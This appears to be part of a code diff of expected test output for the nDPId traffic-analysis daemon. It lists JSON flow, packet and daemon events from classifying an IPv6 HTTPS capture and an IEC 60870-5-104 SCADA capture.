00629{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1448269127960,"flow_last_seen":1448269128028,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::5f","src_port":55145,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1448269127960,"flow_last_seen":1448269128028,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::5f","src_port":55145,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00609{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00609{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","packets-captured":193,"packets-processed":193,"total-skipped-flows":0,"total-l4-data-len":51193,"total-not-detected-flows":1,"total-guessed-flows":7,"total-detected-flows":7,"total-detection-updates":11,"total-updates":0,"current-active-flows":0,"total-active-flows":15,"total-idle-flows":15,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":98,"global_ts_msec":1448269146970}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 193/193

72
test/results/iec60780-5-104.pcap.out
View File

@@ -1,42 +1,42 @@
00465{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"iec60780-5-104.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1219992231267}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992231267,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992231267,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAwbS5AAIAGRKWsG\/htrBv4TwYgCWR6t61JAAAAAHAC\/\/8CpgAAAgQFtAEBBAI="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABNy14eKABXFGNTMCABFAAAwQVVAAIAGcH6sG\/hPrBv4bQlkBiDrZdPBeretSnAS\/\/9DbQAAAgQFtAEBBAI="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAobS9AAIAGRKysG\/htrBv4TwYgCWR6t61K62XTwlAQ\/\/9wMQAAAAAAAAAA"}
00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992231267,"flow_last_seen":1219992231283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992231283,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992393215,"flow_last_seen":1219992393215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992393215,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1219992393215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABXFGNTMABNy14eKCABFAAAwbYNAAIAGRFCsG\/htrBv4TwYiCWRtLtqlAAAAAHAC\/\/\/i0AAAAgQFtAEBBAI="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1219992393215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABNy14eKABXFGNTMCABFAAAwQXdAAIAGcFysG\/hPrBv4bQlkBiJI3nuobS7apnAS\/\/8eOQAAAgQFtAEBBAI="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1219992393216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992393216,"pkt":"ABXFGNTMABNy14eKCABFAAAobYRAAIAGRFesG\/htrBv4TwYiCWRtLtqmSN57qVAQ\/\/9K\/QAAAAAAAAAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992393215,"flow_last_seen":1219992393217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992393217,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992486295,"flow_last_seen":1219992486295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992486295,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1219992486295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486295,"pkt":"ABXFGNTMABNy14eKCABFAAAwbaNAAIAGRDCsG\/htrBv4TwYjCWQlpaXOAAAAAHAC\/\/9fMAAAAgQFtAEBBAI="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1219992486296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486296,"pkt":"ABNy14eKABXFGNTMCABFAAAwQX5AAIAGcFWsG\/hPrBv4bQlkBiP13h8HJaWlz3AS\/\/9KOQAAAgQFtAEBBAI="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1219992486296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992486296,"pkt":"ABXFGNTMABNy14eKCABFAAAobaRAAIAGRDesG\/htrBv4TwYjCWQlpaXP9d4fCFAQ\/\/92\/QAAAAAAAAAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992486295,"flow_last_seen":1219992486297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992486297,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1219992231267,"flow_last_seen":1219992392222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992546983,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992590188,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992590188,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAwbcVAAIAGRA6sG\/htrBv4TwYkCWQxVG2fAAAAAHAC\/\/+LrwAAAgQFtAEBBAI="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABNy14eKABXFGNTMCABFAAAwQYVAAIAGcE6sG\/hPrBv4bQlkBiSd+ybXMVRtoHAS\/\/\/GywAAAgQFtAEBBAI="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAobcZAAIAGRBWsG\/htrBv4TwYkCWQxVG2gnfsm2FAQ\/\/\/zjwAAAAAAAAAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992590188,"flow_last_seen":1219992590189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992590189,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":73,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1219992393215,"flow_last_seen":1219992485282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992650548,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":80,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1219992486295,"flow_last_seen":1219992589197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992710502,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992782348,"flow_last_seen":1219992782348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992782348,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1219992782348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABXFGNTMABNy14eKCABFAAAwbjdAAIAGQ5ysG\/htrBv4TwYpCWQN1WRMAAAAAHAC\/\/+4fAAAAgQFtAEBBAI="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1219992782348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZFAAIAGcEKsG\/hPrBv4bQlkBikE5Jl8DdVkTXAS\/\/8aCwAAAgQFtAEBBAI="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1219992782349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992782349,"pkt":"ABXFGNTMABNy14eKCABFAAAobjhAAIAGQ6OsG\/htrBv4TwYpCWQN1WRNBOSZfVAQ\/\/9GzwAAAAAAAAAA"}
00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992782348,"flow_last_seen":1219992782350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992782350,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992819942,"flow_last_seen":1219992819942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992819942,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1219992819942,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819942,"pkt":"ABXFGNTMABNy14eKCABFAAAwbkRAAIAGQ4+sG\/htrBv4TwYqCWRBsBqPAAAAAHAC\/\/\/OXQAAAgQFtAEBBAI="}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1219992819943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819943,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZZAAIAGcD2sG\/hPrBv4bQlkBir5wu6KQbAakHAS\/\/\/l\/gAAAgQFtAEBBAI="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1219992819943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992819943,"pkt":"ABXFGNTMABNy14eKCABFAAAobkVAAIAGQ5asG\/htrBv4TwYqCWRBsBqQ+cLui1AQ\/\/8SwwAAAAAAAAAA"}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992819942,"flow_last_seen":1219992819944,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992819944,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
